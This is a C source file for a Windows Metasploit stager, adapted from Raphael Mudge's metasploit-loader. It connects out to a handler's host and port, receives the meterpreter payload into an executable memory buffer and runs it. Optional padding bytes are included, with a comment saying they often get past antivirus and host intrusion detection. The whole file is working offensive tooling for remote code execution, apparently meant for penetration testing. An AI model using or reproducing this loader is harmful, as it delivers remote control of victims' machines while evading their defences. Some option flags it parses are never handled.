/*
 *  Starting with Raphael Mudge's metasploit-loader, this is an 
 *  enhancement that supports several variations on the delivery
 *  of the meterpreter payload.
 *
 *  @author Josh Stone (jstone@paysw.com)
 *  @license BSD License.
 */

/*
 * A C-based stager client compat with the Metasploit Framework
 *    based on a discussion on the Metasploit Framework mailing list
 *
 * @author Raphael Mudge (raffi@strategiccyber.com)
 * @license BSD License.
 *
 * Relevant messages:
 * * http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
 * * http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <ctype.h>
#include <unistd.h>

/* init winsock */
void winsock_init() {
	WSADATA	wsaData;
	WORD 		wVersionRequested;

	wVersionRequested = MAKEWORD(2, 2);

	if (WSAStartup(wVersionRequested, &wsaData) < 0) {
		printf("ws2_32.dll is out of date.\n");
		WSACleanup();
		exit(1);
	}
}

/* a quick routine to quit and report why we quit */
void punt(SOCKET my_socket, char * error) {
	printf("Bad things: %s\n", error);
	closesocket(my_socket);
	WSACleanup();
	exit(1);
}

/* attempt to receive all of the requested data from the socket */
int recv_all(SOCKET my_socket, void * buffer, int len) {
	int    tret   = 0;
	int    nret   = 0;
	void * startb = buffer;
	while (tret < len) {
		nret = recv(my_socket, (char *)startb, len - tret, 0);
		startb += nret;
		tret   += nret;

		if (nret == SOCKET_ERROR)
			punt(my_socket, "Could not receive data");
	}
	return tret;
}

/* establish a connection to a host:port */
SOCKET wsconnect(char * targetip, int port) {
	struct hostent *		target;
	struct sockaddr_in 	sock;
	SOCKET 			my_socket;

	/* setup our socket */
	my_socket = socket(AF_INET, SOCK_STREAM, 0);
	if (my_socket == INVALID_SOCKET)
		punt(my_socket, "Could not initialize socket");

	/* resolve our target */
	target = gethostbyname(targetip);
	if (target == NULL)
		punt(my_socket, "Could not resolve target");


	/* copy our target information into the sock */
	memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons(port);

	/* attempt to connect */
	if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )
		punt(my_socket, "Could not connect to target");

	return my_socket;
}

void banner() {
  printf("----------------------------------------------------------------\n");
  printf("       Delay Loader -- Josh Stone -- jstone@paysw.com\n");
  printf("----------------------------------------------------------------\n");
  printf("(adapted from Raphael Mudge's 'metasploit-loader'\n\n");
}

void usage() {
  printf("usage: loader [-p <bytes>] <host> <port>\n\n");
  printf("Connect to <host>:<port> to get a reverse meterpreter\n");
  printf("session.\n\n"); 
  printf("  -p <bytes>    Receive initial padding of length <bytes>\n");
  printf("\n");
}


int main(int argc, char * argv[]) {
  ULONG32 size;
  char *buffer;
  char *i;
  void (*function)();
  void *prefixbuffer;
  char c;
  int udp;
  int prefix = 0;
  int delaysec = 0;
  unsigned char xor = 0;
  char *host;
  int port;
  
  winsock_init();

  banner();

  while((c = getopt(argc, argv, "ud:x:p:")) != -1) {
    switch (c) {
    case 'p':
      prefix = atoi(optarg);
      printf("Configuring a prefix of %d bytes\n", prefix);
      break;
    case 'h':
      usage();
      return 1;
      break;
    default:
      printf("Unknown switch: %c\n", c);
    }
  }

  if (argc - optind != 2) {
    usage();
    exit(1);
  }

  host = argv[optind];
  port = atoi(argv[optind+1]);
  
  /* connect to the handler */
  printf("Connecting to %s:%d\n", host, port);

  SOCKET my_socket = wsconnect(host, port); // argv[1], atoi(argv[2]));

  // If we want to receive some number of bogus bytes before processing
  // the payload, use the "prefix" option.  This will often circumvent
  // A/V or HIDS that monitor the content on the network connection.
  
  if(prefix > 0) {
    prefixbuffer = malloc(prefix);
    int dc = recv(my_socket, prefixbuffer, prefix, MSG_WAITALL);
  }

  sleep(delaysec);
  
  /* read the 4-byte length */
  int count = recv(my_socket, (char *)&size, 4, 0);
  if (count != 4 || size <= 0)
    punt(my_socket, "read a strange or incomplete length value\n");

  /* allocate a RWX buffer */
  buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if (buffer == NULL)
    punt(my_socket, "could not allocate buffer\n");

  /* prepend a little assembly to move our SOCKET value to the EDI register
     thanks mihi for pointing this out
     BF 78 56 34 12     =>      mov edi, 0x12345678 */
  buffer[0] = 0xBF;

  /* copy the value of our socket to the buffer */
  memcpy(buffer + 1, &my_socket, 4);

  /* read bytes into the buffer */
  count = recv_all(my_socket, buffer + 5, size);

  /* cast our buffer as a function and call it */
  function = (void (*)())buffer;
  function();

  return 0;
}

